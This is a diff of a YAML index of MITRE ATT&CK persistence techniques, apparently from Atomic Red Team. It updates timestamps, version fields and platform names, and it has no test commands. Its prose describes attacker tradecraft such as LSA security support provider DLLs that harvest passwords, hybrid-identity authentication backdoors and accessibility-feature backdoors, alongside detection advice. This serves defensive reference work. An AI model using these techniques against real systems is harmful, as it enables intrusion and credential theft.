+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -29635,7 +30067,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -29688,7 +30119,7 @@ persistence:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -29709,12 +30140,11 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -29798,11 +30228,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -29815,7 +30244,6 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -29828,7 +30256,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -29858,7 +30285,8 @@ persistence:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1525:
@@ -29890,7 +30318,7 @@ persistence:
         url: https://github.com/RhinoSecurityLabs/ccat
         description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
           Retrieved September 12, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:27:49.094Z'
       name: Implant Internal Image
       description: |-
         Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -29912,8 +30340,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.005:
     technique:
@@ -29939,7 +30365,7 @@ persistence:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -29965,36 +30391,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -30002,9 +30426,9 @@ persistence:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -30013,21 +30437,22 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -30067,13 +30492,10 @@ persistence:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -30150,12 +30572,11 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30174,6 +30595,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -30181,7 +30603,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -30201,29 +30622,31 @@ persistence:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1505.003:
@@ -30300,12 +30723,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.003
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30320,6 +30742,7 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -30328,18 +30751,18 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -30371,9 +30794,6 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -30445,7 +30865,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -30472,7 +30891,7 @@ persistence:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -30498,13 +30917,11 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -30625,7 +31042,6 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1136.001:
@@ -30697,7 +31113,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.001
     atomic_tests: []
   T1547.004:
@@ -30767,7 +31182,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -30877,7 +31291,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -30931,7 +31344,7 @@ persistence:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -30964,8 +31377,6 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1574.005:
@@ -30996,7 +31407,7 @@ persistence:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -31031,12 +31442,10 @@ persistence:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -31113,7 +31522,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1136.002:
@@ -31167,7 +31575,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.002
     atomic_tests: []
   T1542.002:
@@ -31199,7 +31606,7 @@ persistence:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31229,55 +31636,10 @@ persistence:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
-      type: attack-pattern
-      created: '2019-11-07T20:29:17.788Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.001
-        url: https://attack.mitre.org/techniques/T1137/001
-      - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
-        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
-          Retrieved July 3, 2017.
-        source_name: Microsoft Change Normal Template
-      - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
-        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
-          Retrieved July 3, 2017.
-        source_name: MSDN VBA in Office
-      - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
-        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
-          Retrieved July 3, 2017.
-        source_name: enigma0x3 normal.dotm
-      - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
-        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
-          Retrieved July 3, 2017.
-        source_name: Hexacorn Office Template Macros
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
-        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
-          Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:01:35.918Z'
       name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
@@ -31308,6 +31670,7 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: 'Many Office-related persistence mechanisms require changes
         to the Registry and for binaries, files, or scripts to be written to disk
         or existing files modified to include malicious scripts. Collect events related
@@ -31317,9 +31680,13 @@ persistence:
         also be investigated since the base templates should likely not contain VBA
         macros. Changes to the Office macro security settings should also be investigated.(Citation:
         GlobalDotName Jun 2019)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -31327,11 +31694,47 @@ persistence:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+      created: '2019-11-07T20:29:17.788Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/001
+        external_id: T1137.001
+      - source_name: MSDN VBA in Office
+        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+          Retrieved July 3, 2017.
+        url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+      - source_name: Hexacorn Office Template Macros
+        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+          Retrieved July 3, 2017.
+        url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+      - source_name: Microsoft Change Normal Template
+        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+          Retrieved July 3, 2017.
+        url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+      - source_name: enigma0x3 normal.dotm
+        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+          Retrieved July 3, 2017.
+        url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+      - source_name: CrowdStrike Outlook Forms
+        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+          Movement and Persistence. Retrieved February 5, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.001
     atomic_tests: []
   T1546.009:
@@ -31363,7 +31766,7 @@ persistence:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -31411,13 +31814,11 @@ persistence:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -31430,16 +31831,16 @@ persistence:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
